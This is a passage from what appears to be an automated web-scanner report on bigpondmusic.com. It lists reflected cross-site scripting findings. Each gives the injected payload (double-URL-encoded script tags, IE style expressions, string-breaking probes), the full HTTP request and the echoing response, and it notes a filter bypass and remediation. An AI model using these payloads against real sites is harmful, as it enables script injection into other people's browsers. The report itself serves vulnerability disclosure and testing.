Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
abpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'decadesc5cfa';90b3725ab42';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.276. http://bigpondmusic.com/decades [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /decades

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57a55"style%3d"x%3aexpression(alert(1))"44232a867e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57a55"style="x:expression(alert(1))"44232a867e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /decades?57a55"style%3d"x%3aexpression(alert(1))"44232a867e3=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 84269


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>The Best Music From Each Dec
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/decades?57a55"style="x:expression(alert(1))"44232a867e3=1" />
...[SNIP]...

2.277. http://bigpondmusic.com/images/iepngfix/iepngfix.htc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /images/iepngfix/iepngfix.htc

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ec4678964e was submitted in the REST URL parameter 1. This input was echoed as e8505"><script>alert(1)</script>7ec4678964e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /imagese8505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ec4678964e/iepngfix/iepngfix.htc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88631


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/imagese8505"><script>alert(1)</script>7ec4678964e/iepngfix/iepngfix.htc" />
...[SNIP]...

2.278. http://bigpondmusic.com/images/iepngfix/iepngfix.htc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /images/iepngfix/iepngfix.htc

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a0e0'%3b97f900614f0 was submitted in the REST URL parameter 1. This input was echoed as 7a0e0';97f900614f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7a0e0'%3b97f900614f0/iepngfix/iepngfix.htc HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88134


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'images7a0e0';97f900614f0';
   s.prop4 = 'iepngfix';
   s.prop5 = 'iepngfix.htc';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.279. http://bigpondmusic.com/javascript/BPMusic_DNASEOTrackingCode_Jan10.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/BPMusic_DNASEOTrackingCode_Jan10.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12993%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98a33dd2277 was submitted in the REST URL parameter 1. This input was echoed as 12993"><script>alert(1)</script>98a33dd2277 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript12993%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98a33dd2277/BPMusic_DNASEOTrackingCode_Jan10.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88337


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascript12993"><script>alert(1)</script>98a33dd2277/BPMusic_DNASEOTrackingCode_Jan10.js?20100624-053840" />
...[SNIP]...

2.280. http://bigpondmusic.com/javascript/BPMusic_DNASEOTrackingCode_Jan10.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/BPMusic_DNASEOTrackingCode_Jan10.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea57b'%3bab49e4aa771 was submitted in the REST URL parameter 1. This input was echoed as ea57b';ab49e4aa771 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascriptea57b'%3bab49e4aa771/BPMusic_DNASEOTrackingCode_Jan10.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascriptea57b';ab49e4aa771';
   s.prop4 = 'bpmusic_dnaseotrackingcode_jan10.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel
...[SNIP]...

2.281. http://bigpondmusic.com/javascript/LightBoxFrame.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/LightBoxFrame.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc38f'%3be7c283e434a was submitted in the REST URL parameter 1. This input was echoed as bc38f';e7c283e434a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascriptbc38f'%3be7c283e434a/LightBoxFrame.js?20101103-171218 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87782


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascriptbc38f';e7c283e434a';
   s.prop4 = 'lightboxframe.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;

...[SNIP]...

2.282. http://bigpondmusic.com/javascript/LightBoxFrame.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/LightBoxFrame.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb66ce8c9b91 was submitted in the REST URL parameter 1. This input was echoed as 858db"><script>alert(1)</script>b66ce8c9b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript858db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb66ce8c9b91/LightBoxFrame.js?20101103-171218 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88392


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascript858db"><script>alert(1)</script>b66ce8c9b91/LightBoxFrame.js?20101103-171218" />
...[SNIP]...

2.283. http://bigpondmusic.com/javascript/SWFObject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/SWFObject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94baf'%3b28975e5ccf was submitted in the REST URL parameter 1. This input was echoed as 94baf';28975e5ccf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript94baf'%3b28975e5ccf/SWFObject.js HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:25:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascript94baf';28975e5ccf';
   s.prop4 = 'swfobject.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.p
...[SNIP]...

2.284. http://bigpondmusic.com/javascript/SWFObject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/SWFObject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 258a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2d69280afe was submitted in the REST URL parameter 1. This input was echoed as 258a9"><script>alert(1)</script>a2d69280afe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascript258a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2d69280afe/SWFObject.js HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:25:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascript258a9"><script>alert(1)</script>a2d69280afe/SWFObject.js" />
...[SNIP]...

2.285. http://bigpondmusic.com/javascript/soundmanager2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /javascript/soundmanager2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c4c8'%3bf0102640660 was submitted in the REST URL parameter 1. This input was echoed as 1c4c8';f0102640660 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript1c4c8'%3bf0102640660/soundmanager2.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88063


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
musicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'javascript1c4c8';f0102640660';
   s.prop4 = 'soundmanager2.js';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;

...[SNIP]...

2.286. http://bigpondmusic.com/javascript/soundmanager2.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /javascript/soundmanager2.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca247%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1cfd71e70f was submitted in the REST URL parameter 1. This input was echoed as ca247"><script>alert(1)</script>e1cfd71e70f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /javascriptca247%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1cfd71e70f/soundmanager2.js?20100624-053840 HTTP/1.1
Accept: */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: private
Expires: Tue, 23 Nov 2010 03:07:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 87893


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/javascriptca247"><script>alert(1)</script>e1cfd71e70f/soundmanager2.js?20100624-053840" />
...[SNIP]...

2.287. http://bigpondmusic.com/javascript/srTextContainer.js [REST URL parameter 1]

Summary

